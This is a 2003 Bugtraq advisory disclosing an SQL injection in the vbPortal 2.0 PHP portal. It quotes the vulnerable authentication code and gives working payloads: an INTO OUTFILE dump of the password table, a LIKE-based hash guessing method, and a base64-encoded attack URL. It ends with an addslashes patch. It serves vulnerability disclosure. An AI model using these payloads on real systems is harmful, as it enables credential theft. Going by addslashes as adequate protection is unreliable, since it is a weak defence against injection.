[<prev] [next>] [day] [month] [year] [list]
Message-ID: <Law15-F26SKkjZpt5OM0000763b@hotmail.com>
Date: Sat, 13 Sep 2003 00:08:25 +0200
From: "Frog Man" <leseulfrog@...mail.com>
To: vulnwatch@...nwatch.org, bugtraq@...urityfocus.com
Subject: vbPortal : SQL Injection
Informations :
°°°°°°°°°°°°°
Language : PHP
version : 2.0 alpha 8.1
Website : http://www.vbportal.com
Problem : SQL Injection
Description : vbPortal is a Portal made to complete vBulletin as a CMS.
PHP Code/Location :
°°°°°°°°°°°°°°°°°°°
auth.inc.php :
-----------------------------------------------------------------------------------------
[...]
if(isset($admin)) {
$admin = base64_decode($admin);
$admin = explode(":", $admin);
$aid = "$admin[0]";
$pwd = "$admin[1]";
if ($aid=="" || $pwd=="") {
$admintest=0;
echo "<html>\n";
echo "<title>INTRUDER ALERT!!!</title>\n";
echo "<body bgcolor=\"#FFFFFF\" text=\"#000000\">\n\n<br><br><br>\n\n";
echo "<center><img src=\"images/eyes.gif\" border=\"0\"><br><br>\n";
echo "<font face=\"Verdana\" size=\"+4\"><b>Get
Out!</b></font></center>\n";
echo "</body>\n";
echo "</html>\n";
exit;
}
$result=mysql_query("SELECT password as pwd FROM user WHERE username =
'$aid'");
// $result=mysql_query("select pwd from $prefix"._authors." where
aid='$aid'");
if(!$result) {
echo "Selection from database failed!";
exit;
} else {
list($pass)=mysql_fetch_row($result);
if($pass == $pwd && $pass != "") {
$admintest = 1;
}
}
}
[...]
-----------------------------------------------------------------------------------------
Exploit :
°°°°°°°
The injection is made by $aid. If the value of $aid is ' OR 1=1 INTO OUTFILE
'/complete/path/UserTable.txt, the SQL request became :
SELECT password as pwd FROM user WHERE username = '' OR 1=1 INTO OUTFILE
'/complete/path/UserTable.txt'
and the passwords of the table user can be writted into UserTable.txt, and
is readable on http://[target]/UserTable.txt if the path '/complete/path/'
is the right way to the website directory.
Passwords can also be cracked using LIKE. For example, to know if the
crypted password begon by 'a', you can give to $aid the value ' OR pwd LIKE
'a%.
To inject the first and the second possiblities, we have to use $admin like
this :
base64([VALUETOGIVETO$AID]:1);
E.g. : to use the first example, we have to crypt :
' OR 1=1 INTO OUTFILE '/complete/path/UserTable.txt:1
in base64, like this :
JyBPUiAxPTEgSU5UTyBPVVRGSUxFICcvY29tcGxldGUvcGF0aC9Vc2VyVGFibGUudHh0OjE=
and to inject this via $admin like this :
http://[target]/auth.inc.php?admin=JyBPUiAxPTEgSU5UTyBPVVRGSUxFICcvY29tcGxldGUvcGF0aC9Vc2VyVGFibGUudHh0OjE=
This will of course work both if magic_quotes_gpc is ON or OFF.
Solution :
°°°°°°°°°
A patch can be found on http://www.phpsecure.info.
You just have to replace the line :
---------------------
$aid = "$admin[0]";
---------------------
in auth.inc.php by :
-------------------------------
$aid = addslashes($admin[0]);
-------------------------------
More Details in French :
°°°°°°°°°°°°°°°°°°°°°°
http://www.phpsecure.info/v2/tutos/vbPortal.txt
frog-m@n (http://www.phpsecure.info)
_________________________________________________________________
Powered by blists - more mailing lists